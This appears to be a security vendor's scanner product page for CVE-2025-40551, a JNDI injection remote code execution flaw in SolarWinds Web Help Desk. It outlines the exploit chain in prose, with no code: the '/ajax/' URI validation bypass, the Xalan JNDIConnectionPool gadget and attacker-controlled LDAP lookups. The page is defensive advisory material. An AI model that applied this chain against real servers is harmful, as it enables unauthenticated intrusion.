S4E Mobile Logo

CVE-2025-40551 Scanner

CVE-2025-40551 Scanner - JNDI Injection RCE vulnerability in SolarWinds Web Help Desk

Short Info


Level

Critical

Single Scan

Single Scan

Can be used by

Asset Owner

Estimated Time

10 seconds

Time Interval

1 week 23 hours

Scan only one

URL

Toolbox

SolarWinds Web Help Desk is a comprehensive help desk software used by IT departments and service providers to manage support tickets, assets, and knowledge bases. It allows seamless tracking and prioritizing of service requests, automating ticketing processes, and offers customizable reporting features. Typically used by enterprises and educational institutions, it streamlines IT service management operations and improves visibility into IT processes. The software supports a multi-department setup and integrates with other SolarWinds products for enhanced functionality. SolarWinds Web Help Desk helps in reducing downtime and improving response rates with its efficient ticket management. Its user-friendly web interface makes it accessible for growing businesses requiring centralized service request management.

The JNDI Injection vulnerability in SolarWinds Web Help Desk can lead to remote code execution. It stems from an insecure deserialization flaw in the jabsorb JSON-RPC library, allowing attackers to exploit the Apache Xalan JNDIConnectionPool class. This vulnerability enables unauthenticated, remote attackers to send malicious payloads that bypass existing CSRF whitelists. The ability to switch endpoint directories circumvents several payload sanitation functions. The severity is amplified due to the ease of exploitation without needing user interaction or authentication. This vulnerability is particularly critical as it can compromise entire systems if exploited.

The technical details of the JNDI Injection vulnerability involve exploiting the JSON-RPC endpoints used by SolarWinds Web Help Desk. Attackers can include a specific malformed parameter, "/ajax/", in their requests to bypass URI validation. By utilizing the vulnerable "JNDIConnectionPool" from Apache Xalan, attackers can perform a deserialization attack. The attack involves sending crafted JSON payloads containing a JNDI path pointing to a malicious LDAP server controlled by the attacker. This ultimately leads to arbitrary code execution, pivoting through the system via unauthorized actions enabled by the injection flaw. The attack chain effectively exploits known components and bypasses defense mechanisms relying on endpoint sanitization.

When the JNDI Injection vulnerability in SolarWinds Web Help Desk is exploited, it can have severe consequences. Attackers may gain unauthorized access to the server hosting the application, leading to potential data exfiltration or system commandeering. The resultant code execution could allow attackers to deploy malware or pivot through connected systems, creating a larger security breach. Data integrity and confidentiality might be severely compromised, with attackers potentially manipulating or destroying data stored or processed by the software. Exploitation of this vulnerability could result in financial loss, reputational damage, and loss of customer trust for affected organizations.

REFERENCES

Get started to protecting your digital assets